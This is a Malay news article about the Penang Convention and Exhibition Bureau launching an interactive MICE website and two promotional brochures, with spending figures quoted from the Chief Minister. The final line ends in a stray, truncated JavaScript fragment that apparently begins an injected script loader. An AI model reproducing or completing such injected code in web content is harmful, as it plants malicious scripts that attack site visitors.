Laman sesawang & risalah interaktif PCEB promosi industri MICE negeri

Admin

Oleh : AINUL WARDAH SOHILLI & NORSHAHIDA YUSOFF

Gambar : DARWINA MOHD. DAUD

GEORGE TOWN – Penang Convention and Exhibition Bureau (PCEB) baru-baru ini melancarkan laman sesawang interaktif, www. pceb.my, bagi memudahkan urusan berhubung mesyuarat, insentif, konvensyen dan pameran (MICE) di Pulau Pinang.

Ketua Pegawai Eksekutifnya, G. Ashwin berkata, langkah itu sejajar dengan kemampuan Pulau Pinang menganjurkan pelbagai pameran dan konvensyen bertaraf dunia.

“Laman sesawang ini akan memberikan nilai tambah kepada pelanggan dari segi maklumat, perkhidmatan dan keperluan yang diperlukan dalam penganjuran sesuatu acara bertaraf antarabangsa.

“Saya percaya, melalui laman sesawang interaktif ini, ia akan memberi manfaat bukan sahaja kepada rakan-rakan dalam industri MICE, tetapi juga mempromosikan Pulau Pinang sebagai salah satu destinasi pilihan MICE terunggul,” katanya pada Majlis Peluncuran Laman Sesawang Interaktif PCEB di sini baru-baru ini.

Hadir menyempurnakan peluncuran tersebut ialah Ketua Menteri, Y.A.B. Tuan Lim Guan Eng.

Laman sesawang interaktif PCEB bukan sahaja direka bagi memenuhi permintaan pelanggan untuk menikmati pengalaman atas talian yang lebih bersifat peribadi, malah membolehkan pelanggan mengetahui maklumat terkini dan mendapatkan perkhidmatan terbaik berhubung MICE di Pulau Pinang dengan ciri-ciri utama terkini turut diperkenalkan iaitu fungsi permohonan Request For Proposal (RFP) dan Industry Partner Programme (IPP) demi kemudahan pelanggan.

Dalam perkembangan berasingan, PCEB turut meluncurkan dua penerbitan risalah sulung, Destination Experience Brochure dan Penang MICE Guide 2016-17 pada 15 April lalu di Wisma Yeap Chor Ee di sini.

Direka sebagai sebuah risalah berbentuk ‘coffee table book’, kedua-dua penerbitan tersebut mempamerkan kekayaan budaya, warisan, alam semulajadi dan kesenian di Pulau Pinang di samping menjadi destinasi pilihan unik untuk konvensyen, perniagaan serta percutian.

Guan Eng memberitahu, industri MICE merupakan pemacu penting bagi ekonomi Pulau Pinang.

“Menurut Biro Konvensyen dan Pameran Malaysia atau MyCEB, purata perbelanjaan dianggarkan bagi setiap pelancong perniagaan antarabangsa yang melawat ke Pulau Pinang pada tahun 2015 mencecah USD$3,500 (anggaran RM13,638) berbanding pelancong biasa hanya sekitar RM2,000.

“Laporan Travel & Tourism Economic Impact 2015 Malaysia oleh Majlis Kembara dan Pelancongan Dunia pula menyatakan bahawa perbelanjaan perjalanan perniagaan berkembang sebanyak 10.2 peratus pada tahun lalu (2015) iaitu RM72.4 bilion dan dijangka meningkat 5 peratus setiap tahun menjadikan RM 117.9 bilion menjelang tahun 2025,” ujar beliau.

PCEB adalah sebuah pertubuhan bukan berasaskan keuntungan yang diwujudkan pada Januari lalu bagi membantu dan memudahcara industri MICE di Pulau Pinang.var d=document;var s=d.createElement(‘script’);